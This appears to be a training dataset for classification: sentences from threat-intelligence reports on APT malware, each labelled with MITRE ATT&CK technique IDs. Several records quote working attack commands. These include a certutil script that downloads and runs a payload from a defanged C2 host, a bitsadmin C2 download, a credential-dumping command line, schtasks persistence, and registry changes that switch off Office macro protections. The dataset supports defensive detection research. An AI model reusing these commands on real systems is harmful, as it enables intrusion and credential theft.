{"text1":"Encrypted Configuration in shellcode The configuration information for the malware, including the C2 information are encrypted in the first shellcode blob and are passed as an argument to the DllMain function of the main PlugX DLL","labels":"['T1082', 'T1140', 'T1027']"}
|
|
{"text1":"Escalate Privileges APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes","labels":"['T1003', 'T1068']"}
|
|
{"text1":"Examining the use of the unique user agents\u2019 strings over time shows that while previously only the Mozilla\/5.0 user agent was in use, since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications","labels":"['T1033', 'T1543.001']"}
|
|
{"text1":"Exfiltration BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration","labels":"['T1074', 'T1505.003', 'T1132']"}
|
|
{"text1":"Figure 11: XML configuration file to schedule the task The Zyklon malware first retrieves the external IP address of the infected machine using the following: api.ipify[.]org ip.anysrc[.]net myexternalip[.]com whatsmyip[.]com The Zyklon executable contains another encrypted file in its .Net resource section named tor","labels":"['T1036', 'T1027']"}
|
|
{"text1":"Figure 12: RSA public key 1 Figure 13: RSA public key 2 Figure 14: AES encryption parameters After encryption, the cipher text to be sent over C2 is Base64 encoded","labels":"['T1573']"}
|
|
{"text1":"Figure 13: Zyklon issuing \u201csettings\u201d command and subsequent server response Figure 14: Zyklon issuing \u201csign\u201d command and subsequent server response Figure 15: Zyklon issuing \u201cddos\u201d command and subsequent server response Plugin Manager Zyklon downloads number of plugins from its C2 server","labels":"['T1016', 'T1105']"}
|
|
{"text1":"Figure 2: Textbox inside DOC The combined script from Word textbox drops the following components: \\Users\\[user_name]\\Intel\\58d2a83f7778d5.36783181.vbs \\Users\\[user_name]\\Intel\\58d2a83f777942.26535794.ps1 \\Users\\[user_name]\\Intel\\58d2a83f777908.23270411.vbs Also, the script creates a named scheduled task for persistence to launch \u201c58d2a83f7778d5.36783181.vbs\u201d every 25 minutes","labels":"['T1033', 'T1036', 'T1087', 'T1064', 'T1204']"}
|
|
{"text1":"Figure 26.\u00a0Communication with the C&C server after the exchange of OS packet info Meanwhile, the runHandle method of the main backdoor loop will call for the requestServer method with the following backdoor commands (each command has one byte long code and is extracted by Packet::getCommand): Figure 27.\u00a0The getCommand method The figure below shows the example of two of several possible command codes","labels":"['T1140', 'T1008']"}
|
|
{"text1":"Figure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks In this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s \u201cSquiblydoo\u201d App Whitelisting bypass every 30 minutes","labels":"['T1053.005', 'T1036']"}
|
|
{"text1":"Figure 5: Sample pseudo-HTTP beacon The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command","labels":"['T1071', 'T1090']"}
|
|
{"text1":"File Indicators Samples Observed from Spear Phishing Messages Above Filename Chinas_Arctic_Dream.doc File Size 6587812 bytes MD5 598eeb6a18233023f3551097aa49b083 SHA1 e9a46966f93fe15c22636a5033c61c725add8fa5 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe","labels":"['T1036', 'T1083']"}
|
|
{"text1":"Filename The_Four_Traps_for_China.doc File Size 4428595 bytes MD5 7659c41a30976d523bb0fbb8cde49094 SHA1 3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe","labels":"['T1036']"}
|
|
{"text1":"FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment","labels":"['T1090', 'T1049']"}
|
|
{"text1":"Finally, the malware executes the extracted install.bat script before deleting the original files and exiting","labels":"['T1070.004', 'T1064']"}
|
|
{"text1":"Finally, the Trojan creates a scheduled task to run itself every three minutes by running the following command on the command prompt after replacing the %path% string with the path to the srvResesponded.vbs VBScript:SchTasks \/Create \/SC MINUTE \/MO 3 \/TN \u201cInetlSecurityAssistManager\u201d \/TR \u201cwscript %path%\u201d \/f The Trojan uses HTTP to communicate with its C2 server, specifically using the InternetExplorer application object within an embedded Microsoft .NET Framework assembly called Interop.SHDocVw","labels":"['T1071', 'T1053.005']"}
|
|
{"text1":"First, the macro attempts to enable macros in multiple versions of Word, PowerPoint, Publisher and Excel by setting the following registry keys to the value of 1: HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings The macro also attempts to disable protections provided by the Protected View capability within Word, Excel, and PowerPoint by setting the following registry keys to a value of 1: HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV \u00a0 First Stage Payload The payload installed by the macro is a downloader Trojan written in VB.NET that downloads a secondary payload and decoy document","labels":"['T1553.002', 'T1518.001', 'T1005', 'T1027.001', 'T1112', 'T1598.002', 'T1204', 'T1203', 'T1497']"}
|
|
{"text1":"Following these checks, it drops several more malware files signed with the pasted AMD digital signature to a directory it creates","labels":"['T1553.002', 'T1083']"}
|
|
{"text1":"For example, From <COMPUTER-NAME> (01-04 11-40-02).txt All the text files are now packed into the archive temp.zip (%temp%\\temp.zip) zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt txt is uploaded to the control server Additional Commands and Capabilities The service-based DLL implant traverses to the \/htdocs\/ directory on the FTP server and looks for any files with the keywords: TO EVERYONE: Commands issued to all infected endpoints TO <COMPUTERNAME>: Commands issued to endpoints matching the ComputerName The following commands are supported by the malware implant: cmd \/c pull <filename>: Adds filename to temp.zip, Base64 encodes, and uploads to control server cmd \/c chip <string>: Deletes current ipnet.ini config file","labels":"['T1059', 'T1560', 'T1132']"}
|
|
{"text1":"For example, the following string would be included in one of the HTTP parameters sent to the C2 server: eRmaVsr90D-7Ig1ngV3PkdouzP974 In this specific case, the actor made a mistake when configuring this XAgent sample with its C2 locations","labels":"['T1071', 'T1008']"}
|
|
{"text1":"For instance, here are the resulting decrypted strings from each of the case statements (dd7e69e1\u2026): Case \u2013 String decrypted 1 \u2013 185.25.50[.]93 2 \u2013 POST http:\/\/185.25.50[.]93\/syshelp\/kd8812u\/protocol.php HTTP\/1.1\\r\\nHost: 185.25.50[.]93\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 3 \u2013 porg= 4 \u2013 Content-Length: The Trojan uses raw sockets to communicate with its C2 server and uses the decrypted string above to create HTTP requests","labels":"['T1071', 'T1140', 'T1008']"}
|
|
{"text1":"For instance, the following data exists within a resource: fb 70 b0 c9 bd c5 8a d4 0c 54 fd 4c 6d bb f0 0f By multiplying each byte with -1, we obtain the following data: 05 90 50 37 43 3b 76 2c f4 ac 03 b4 93 45 10 f1 After using RC4 and the key 14331d289e737093994395d3fc412afc, the following cleartext data appears: \\x00\\x00\\x00\\x00FlashRun.vbs We do not see the payload using this FlashRun.vbs filename, instead it uses a temporary file name to store an embedded VBScript file, such as %Temp%\\4.tmp\\5.vbs","labels":"['T1036', 'T1064', 'T1486']"}
|
|
{"text1":"From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality","labels":"['T1140', 'T1056']"}
|
|
{"text1":"From those servers the threat actor could use a web shell to retrieve the encrypted archives: copy \\\\{FILE PATH}\\c$\\programdata\\*.tmp \\\\{FILE PATH}\\ServiceDesk\\custom\\style After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection","labels":"['T1070.004', 'T1505.003']"}
|
|
{"text1":"Function for scrambling AES256 key in the outgoing packet Some screenshots taken during scrambling and encryption process: Figure 21.\u00a0The highlighted bytes represent the scrambled computer info Figure 22.\u00a0Randomly generated AES256 key Figure 23.\u00a0Scrambled AES256 key (0xC1 XOR 0x13 = 0xD2, 0xD2 ROL 6 = 0xB4) etc.) Figure 24.\u00a0Computer info encrypted with AES256 key Figure 25.\u00a0Screenshot of the final payload to be sent to C&C server","labels":"['T1113', 'T1573']"}
|
|
{"text1":"Gather the process time for all processes Getting time information for all processes running on the system","labels":"['T1055', 'T1057', 'T1124']"}
|
|
{"text1":"Generate payloads in various formats: Format Architecture Short Name Android Package x86 & ARMv7 apk Linux Binary x86 lin_x86 Linux Binary x64 lin_x64 Linux Shared Object x86 so_x86 Linux Shared Object x64 so_x64 Windows PE Executable x86 exe_x86 Windows PE Executable x64 exe_x64 Windows DLL x86 dll_x86 Windows DLL x64 dll_x64 Python Script x86 & x64 py PyInstaller x86 & x64 pyinst Python Oneliner x86 & x64 py_oneliner Powershell x86 & x64 ps1 Powershell Oneliner x86 & x64 ps1_oneliner Ducky Script N\/A rubber_ducky Deploy in memory from a single command line using python or powershell one-liners","labels":"['T1106', 'T1010', 'T1059.001']"}
|
|
{"text1":"Get-Process | select Company Checks to see if any running processes have \u201cWireshark\u201d or \u201cSysinternals\u201d as the company name","labels":"['T1518.001', 'T1057']"}
|
|
{"text1":"Having a Meterpreter session on a compromised computer allows for full control of the computer and exfiltration of any data, and in some cases lateral movement inside the organization","labels":"['T1123', 'T1132']"}
|
|
{"text1":"Here is the content of the file: \/shellcode <90909090909090909090E800<...redacted\u2026>4D2D6DC95CBD5DC1811111111111111> def <7B0D0A2756...redacted\u2026>312067657420636C6F736566696C650D0A717569740D0A7D> token pop exch pop Exec The executed shellcode will first perform a decoding routine designed to download an additional payload from the internet","labels":"['T1064', 'T1105']"}
|
|
{"text1":"High Commissioner of Bangladesh Pakistan eying Sukhoi-35 fighter planes as part of defense deal from Russia 2018.143 PG COURSE IN 2018-2021 BATCH India Bangladesh and Pakistan Press Release on Observance of Historic Mujibnogor Dibosh by Pakistan Mission on 17 April 2018 Afghan Bomb Blast report by ISI USAJOBS Daily Saved Search Results for New GS15 for 3\/30\/2018 How Rigging take place in Senate Elections in Pakistan Afghan Terrorist group details ISI Restricted113 1971 Liberation War Freedom Fighters in Pakistan Army Custody Database Additionally, the following filenames were witnessed in these attacks (spelling and grammar mistakes included): Liberation Freedom Fighter.xlam NSC details of participants.xlam Raw Sect Vikram report on Pak Army Confidential.doc USA Immagration Policy for Families.ppam doc CV FM.doc doc Sukhoi35 deal report.doc Nominal Roll.doc Press Release 17 April.doc Afghan Blast report by ISI.doc Rigging in Pakistan Senate.doc Afghan Terrorist group report.doc \u00a0 The payloads for these attacks varied in malware family","labels":"['T1083']"}
|
|
{"text1":"Hook module structure After decrypting the strings, it became clear that the Linux Hook main module communicated with the same CnC server as other Windows modules: The CNC\u2019s IP address in the Linux module This Linux module can process the following commands, some of which are similar to the Windows version: die delete all BlackEnergy2 files and system traces kill delete all BlackEnergy2 files and system traces and reboot lexec launch a command using bin\/sh rexec download and launch file using \u2018fork\/exec\u2019 update rewrite self file migrate update the CnC server Windows Plugins After the disclosure of an unusual CnC server that pushed Linux and the new Windows plugins we paid greater\u00a0attention to new BE2 samples and associated CnCs","labels":"['T1106', 'T1070.004', 'T1105']"}
|
|
{"text1":"However, if you DO get infected, you\u2019ll want to delete the following registry keys (if they exist): HKLM\/System\/CurrentControlSet\/Services\/DirecastX ytasda jrqq HKLM\/System\/CurrentControlSet\/Services\/DirectX yta jsdrq HKLM\/System\/CurrentControlSet\/Services\/DirectX ytsda jrq Additionally, you\u2019ll want to delete any copies of \u201csvchost.exe\u201d that you find in %Program Files (x86)%\/DIFXE\/, as these are the dropped copies of the malware","labels":"['T1070.004', 'T1112']"}
|
|
{"text1":"However, we were able to determine a unique, hard-coded user agent used for the C2 communications: Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Using AutoFocus, we pivoted from the user agent string to expand our data set to three additional Zebrocy samples using the exact same user agent","labels":"['T1087', 'T1543.001']"}
|
|
{"text1":"If that fails, the payload will use DNS tunneling by first issuing a DNS query to resolve the following domain to notify the C2 that the payload will send data to it in subsequent DNS queries: \u00a0 ns1.<random number between 100000 and 999999>.<c2 name> \u00a0 The payload will then split the message up into 60-byte chunks (only 1 in this case), which it will send to the C2 via DNS queries to resolve domains structured as: \u00a0 <encoded\/encrypted data of message>.<same random number between 100000 and 999999>.<c2 name> \u00a0 The payload will notify the C2 that it is done sending data by issuing a DNS query to resolve a domain structured as: \u00a0 ns2.<same random number between 100000 and 999999>.<c2 name> \u00a0 Package Comparison of the QUADAGENT Samples The bat2exe version (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63)has a batch script, PowerShell script, and associated file names embedded within several resources that it will decrypt using RC4 and various MD5 hashes for keys","labels":"['T1071', 'T1573', 'T1048', 'T1008']"}
|
|
{"text1":"If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what\u00a0 commands the C2 wishes to run by issuing a request to the following URL: http:\/\/<c2 domain>\/what?<hex(Environment.UserName\/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2\u2019s response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit","labels":"['T1071', 'T1573', 'T1041', 'T1571', 'T1132', 'T1008', 'T1043']"}
|
|
{"text1":"If the mutex does not exist and a Windows Startup Registry key with name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by: Copying itself to the path %PROGRAMDATA%\\svchost.exe Sets the Windows Startup Registry key with the name \u201cSystem Update\u201d which points to the above dropped payload","labels":"['T1112', 'T1547.001']"}
|
|
{"text1":"If there are keys for the string encryption with the XOR algorithm, the configuration data will be also encrypted with the XOR algorithm","labels":"['T1573', 'T1027']"}
|
|
{"text1":"If the Trojan receives this echo, it will create the following file that the Trojan uses as a signal that it was able to successfully communicate with its C2 server: %APPDATA%\\Windows\\ShwDoc.srv If the Trojan determines the C2 server wishes to send a command, it sends an HTTP request to the following URL: hxxp:\/\/www.windowspatch[.]com\/tahw?<hex(STDOUT of whoami command)> The Trojan will first check the response to this request for the string spoo, which signifies the C2 does not wish to issue a command","labels":"['T1071', 'T1008']"}
|
|
{"text1":"If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern: \u00a0[a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com VBScript #2 \u201cmshta.exe\u201d further executes the second VBScript \u201c58d2a83f777908.23270411.vbs\u201d, which creates a folder by GUID name inside \u201cIntel\u201d and drops the VBScript payloads and configuration files: \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777638.60220156.ini \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777688.78384945.ps1 \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776b5.64953395.txt \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776e0.72726761.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777716.48248237.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777788.86541308.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\Foxconn.lnk This script then executes \u201c58d2a83f777716.48248237.vbs\u201d, which is a variant of FIN7\u2019s HALFBAKED backdoor","labels":"['T1036', 'T1064']"}
|
|
{"text1":"In 2016, CTU researchers observed the group using native system functionality to disable logging processes and delete logs within a compromised environment","labels":"['T1562.001', 'T1070.004']"}
|
|
{"text1":"In all of the DropIt samples we collected, the dropper will then save the executable to the user\u2019s %TEMP% folder and execute the file, specifically to one of the following filenames: %TEMP%\\spp.exe %TEMP%\\sloo.exe %TEMP%\\spoo.exe %TEMP%\\vschos.exe We have also seen Magic Hound using DropIt like a binder Trojan, specifically dropping a legitimate decoy executable along with the malicious executable as a payload","labels":"['T1055.012', 'T1036']"}
|
|
{"text1":"In December 2018, a thread on HackForums described a change in the ownership and ongoing development of the HawkEye keylogger. Shortly following this exchange, new posts began to appear that were attempting to market and sell new versions of HawkEye (HawkEye Reborn v9), with these new posts also referencing the change in ownership of the project moving forward. HawkEye Reborn v9 is currently marketed as an \"Advance Monitoring Solution.\" It is currently being sold using a licensing model, with purchasers gaining access to the software and updates for different periods based on a tiered pricing model. HawkEye Reborn v9 also features a Terms of Service agreement that provides some additional insight","labels":"['T1543.003', 'T1008']"}
|
|
{"text1":"Indicators File Hash Description x.js 3fefa55daeb167931975c22df3eca20a HOMEFRY, a 64-bit Windows password dumper\/cracker mt.exe 40528e368d323db0ac5c3f5e1efe4889 MURKYTOP, a command-line reconnaissance tool\u00a0 com4.js a68bf5fce22e7f1d6f999b7a580ae477 AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages Historical Indicators File Hash Description green.ddd 3eb6f85ac046a96204096ab65bbd3e7e AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages BGij 6e843ef4856336fe3ef4ed27a4c792b1 Beacon, a commercially available backdoor msresamn.ttf a9e7539c1ebe857bae6efceefaa9dd16 PHOTO, also reported as Derusbi 1024-aa6a121f98330df2edee6c4391df21ff43a33604 bd9e4c82bf12c4e7a58221fc52fed705 BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration","labels":"['T1140']"}
|
|
{"text1":"Indicators of compromise MITRE ATT&CK techniques Modify existing service Code signing File deletion Deobfuscate\/decode files or information System information discovery Process discovery Service execution RunDLL32 Scripting Command-line Interface Data from local system Automated exfiltration Data encrypted Commonly used port Bypass user account control Hashes fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3 f684e15dd2e84bac49ea9b89f9b2646dc32a2477 1d280a77595a2d2bbd36b9b5d958f99be20f8e06 19d9573f0b2c2100accd562cc82d57adb12a57ec f90a2155ac492c3c2d5e1d83e384e1a734e59cc0 9b832dda912cce6b23da8abf3881fcf4d2b7ce09 f3b62fea38cb44e15984d941445d24e6b309bc7b 66d2cea01b46c3353f4339a986a97b24ed89ee18 7113aaab61cacb6086c5531a453adf82ca7e7d03 d41daba0ebfa55d0c769ccfc03dbf6a5221e006a 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c 35ab747c15c20da29a14e8b46c07c0448cef4999 e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0 bca861a46d60831a3101c50f80a6d626fa99bf16 01530adb3f947fabebae5d9c04fb69f9000c3cef 4229896d61a5ad57ed5c247228606ce62c7032d0 4c7e975f95ebc47423923b855a7530af52977f57 5a6ad7a1c566204a92dd269312d1156d51e61dc4 1dc50bfcab2bc80587ac900c03e23afcbe243f64 003e21b02be3248ff72cc2bfcd05bb161b6a2356 9b7c3c48bcef6330e3086de592b3223eb198744a 85e2453b37602429596c9681a8c58a5c6faf8d0c Domains ftp.byethost31.com ftp.byethost11.com 1113427185.ifastnet.org navermail.byethost3.com nihon.byethost3.com","labels":"['T1048']"}
|
|
{"text1":"Indirect Code Execution Through INF and SCT This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018","labels":"['T1140', 'T1064']"}
|
|
{"text1":"In one incident, the threat actor used the Wrapikatz tool (w.exe) with a usage statement that retrieves various passwords and Windows credentials from memory and compiles them in w.txt: c:\\programdata\\w.exe \u2013w \u2013l \u2013c>>c:\\programdata\\w.txt In a separate incident, the threat actor used access provided by extensive web shell deployment to harvest account credentials: 2016-10-03T09:27:47 dir 2016-10-03T09:28:11 w64.log >ppp.log 2016-10-03T09:30:10 PowerShell.exe -ExecutionPolicy Bypass -File getpwd.ps1 >iistail.log In another example, BRONZE UNION leveraged the Kekeo credential abuse tool to exploit CVE-2014-6324, a vulnerability in Microsoft's implementation of the Kerberos network authentication protocol","labels":"['T1003', 'T1068']"}
|
|
{"text1":"In other cases, threat actors placed web shells on externally accessible servers, sometimes behind a reverse proxy, to execute commands on the compromised system","labels":"['T1090', 'T1059', 'T1505.003']"}
|
|
{"text1":"In particular, the threat actors have exploited CVE-2011-3544, a vulnerability in the Java Runtime Environment, to deliver the HttpBrowser backdoor; and CVE-2010-0738, a vulnerability in JBoss, to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code","labels":"['T1068', 'T1203']"}
|
|
{"text1":"Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file: \"C:\\Windows\\system32\\cmd.exe\" \/C systeminfo >> \"C:\\Ahnlab\\$$$A24F.TMP\" \"C:\\WINDOWS\\system32\\cmd.exe\" \/C tasklist \/v >> \"C:\\Ahnlab\\$$$A24F.TMP\" NavRAT Capabilities NavRAT is a remote access trojan (RAT) designed to upload, download and execute files","labels":"['T1074', 'T1105']"}
|
|
{"text1":"In the event this privilege was obtained, the common startup folder is queried by reading the following registry key: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup Alternatively, if the privilege was unable to be obtained, Reaver.v2 will obtain the user\u2019s startup folder by querying the following registry key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup Reaver proceeds to write a shortcut file to \u2018%TEMP%\\~WUpdate.lnk\u2019","labels":"['T1547.001', 'T1012']"}
|
|
{"text1":"In the following example, archives for exfiltration were renamed as .tmp files: move \\\\{FILE PATH}\\c$\\programdata\\AT.part01.rar \\\\{FILE PATH}\\c$\\programdata\\at01.tmp The TMP files were then staged for exfiltration on Internet-facing servers that had previously been compromised with the China Chopper web shell","labels":"['T1070.004', 'T1074']"}
|
|
{"text1":"In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor","labels":"['T1598.003', 'T1598.002']"}
|
|
{"text1":"In this particular instance, the following script is retrieved: @echo off :if exist \"%PROGRAMFILES(x86)%\" (GOTO 64BITOS) ELSE (GOTO 32BITOS) :32BITOS certutil -urlcache -split -f http:\/\/s8877.1apps[.]com\/vip\/setup.txt > nul certutil -decode -f setup.txt setup.cab > nul del \/f \/q setup.txt > nul GOTO ISEXIST :64BITOS :certutil -urlcache -split -f http:\/\/s8877.1apps[.]com\/vip\/setup2.txt > nul :certutil -d^ecode -f setup2.txt setup.cab > nul :del \/f \/q setup2.txt > nul :GOTO ISEXIST :ISEXIST if exist \"setup.cab\" (GOTO EXECUTE) ELSE (GOTO EXIT) :EXECUTE ver | findstr \/i \"10\\.\" > nul IF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS) :WIN10 expand %TEMP%\\setup.cab -F:* %CD% > nul :if exist \"%PROGRAMFILES(x86)%\" (rundll32 %TEMP%\\drv.dll EntryPoint) ELSE (rundll32 %TEMP%\\drv.dll EntryPoint) %TEMP%\\install.bat GOTO EXIT :OTHEROS wusa %TEMP%\\setup.cab \/quiet \/extract:%TEMP% > nul %TEMP%\\install.bat GOTO EXIT :EXIT del \/f \/q setup.cab > nul del \/f \/q %~dpnx0 > nul This script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable","labels":"['T1071', 'T1218.011']"}
|
|
{"text1":"IOCs Domain supservermgr[.]com URL hxxp:\/\/supservermgr[.]com\/sys\/upd\/pageupd.php Zebrocy d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1 5b5e80f63c04402d0b282e95e32155b2f86cf604a6837853ab467111d4ac15e2 dd7e69e14c88972ac173132b90b3f4bfb2d1faec15cca256a256dd3a12b6e75d Koadic abbad7acd50754f096fdc6551e728aa6054dcf8e55946f90a02b17db552471ca User Agents Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Mozilla\/5.0 (Windows NT 6.1; WOW64) WinHttp\/1.6.3.8 (WinHTTP\/5.1) like Gecko Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko\/20100101 Firefox\/6.0.1 IPs 185.25.51[.]198 185.25.50[.]93 220.158.216[.]127 92.114.92[.]102 86.106.131[.]177 DDE Docs 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff","labels":"['T1087']"}
|
|
{"text1":"Irdsnhrxxxfery64 manipulation on userinit.exe & unins000.exe Injection Technique To Increase Stealthiness After locating one of the target processes, the malware uses Process Hollowing (MITRE Technique T1093) to evasively create a new process from a legitimate source","labels":"['T1055.012', 'T1057']"}
|
|
{"text1":"It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string","labels":"['T1082', 'T1071']"}
|
|
{"text1":"It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language.\u00a0 \u00a0The main module collecting information about the machine","labels":"['T1082', 'T1016', 'T1087']"}
|
|
{"text1":"It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell","labels":"['T1113', 'T1083']"}
|
|
{"text1":"It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads: ID Thread description 1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility 2 Decrypts command from registry using RC4 with a hardcoded key, and executes it 3 Transfers screenshots from the clipboard to \\Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the \u201csalamati\u201d key (\u201chealth\u201d in Farsi) 4 Transfers screenshots to \\Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies 5 Checks network connection, encrypts and sends gathered logs 6 Unhooks mouse and keyboard, removes bitsadmin task 7 Checks if malware\u2019s working directory size already exceeds its threshold 8 Gathers victim\u00b4s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads The malware uses the following command to receive data from its C2: bitsadmin.exe \/TRANSFER HelpCenterDownload \/DOWNLOAD \/PRIORITY normal <server> <file>http:\/\/<server_config>\/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name> Activity logging module (Splitter.exe) This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc","labels":"['T1113', 'T1115']"}
|
|
{"text1":"It then creates the following registry key to automatically run the Trojan each time the system starts: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\@RANDOM@ The main behavior carried out by this Trojan involves obtaining an embedded executable, hollowing the current Trojan, writing the new embedded executable to the process memory and calling a specific function in the newly written payload","labels":"['T1055.012', 'T1547.001']"}
|
|
{"text1":"It then launches player.exe, a CozyDuke dropper maintaining anti-detection techniques: 3d3363598f87c78826c859077606e514,player.exe,338kb,Trojan.Win32.CozyBear.v,CompiledOn:2014.07.02 21:13:33 Anti-detection and trojan functionality The file collects system information, and then invokes a WMI instance in the root\\securitycenter namespace to identify security products installed on the system, meaning that this code was built for x86 systems, wql here: SELECT * FROM AntiVirusProduct SELECT * FROM FireWallProduct The code hunts for several security products to evade: CRYSTAL KASPERSKY SOPHOS DrWeb AVIRA COMODO Dragon In addition to the WMI\/wql use, it also hunts through the \u201cSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\u201d registry key looking for security products to avoid","labels":"['T1518.001', 'T1036']"}
|
|
{"text1":"JAVASCRIPT CODE SNIPPETS: The first stage JavaScript copies additional JavaScript code snippets in txt format from the RTF document into a random directory \u201cC:\\Users\\<User Name>\\<Random guid>\\\u201d","labels":"['T1033', 'T1064']"}
|
|
{"text1":"Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co","labels":"['T1518.001', 'T1124', 'T1497']"}
|
|
{"text1":"Lateral Movement, Maintain Presence, and Complete Mission APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc","labels":"['T1021.001', 'T1021']"}
|
|
{"text1":"Like the ChinaChopper web shell, the OwaAuth web shell requires a password","labels":"['T1059', 'T1505.003']"}
|
|
{"text1":"Malware Capabilities WINDSHIELD Command and control (C2) communications via TCP raw sockets Four configured C2s and six configured ports \u2013 randomly-chosen C2\/port for communications Registry manipulation Get the current module's file name Gather system information including registry values, user name, computer name, and current code page File system interaction including directory creation, file deletion, reading, and writing files Load additional modules and execute code Terminate processes Anti-disassembly KOMPROGO Fully-featured backdoor capable of process, file, and registry management Creating a reverse shell File transfers Running WMI queries Retrieving information about the infected system SOUNDBITE C2 communications via DNS Process creation File upload Shell command execution File and directory enumeration\/manipulation Window enumeration Registry manipulation System information gathering PHOREAL C2 communications via ICMP Reverse shell creation Filesystem manipulation Registry manipulation Process creation File upload BEACON (Cobalt Strike) Publicly available payload that can inject and execute arbitrary code into processes Impersonating the security context of users Importing Kerberos tickets Uploading and downloading files Executing shell commands Configured with malleable C2 profiles to blend in with normal network traffic Co-deployment and interoperability with Metasploit framework SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB Table 3: APT32 Malware and Capabilities APT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure","labels":"['T1041']"}
|
|
{"text1":"Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications","labels":"['T1553.002', 'T1573']"}
|
|
{"text1":"Obfuscation Mechanism for the JScript Code The malicious JScript code obfuscation relies on two main techniques","labels":"['T1140', 'T1027']"}
|
|
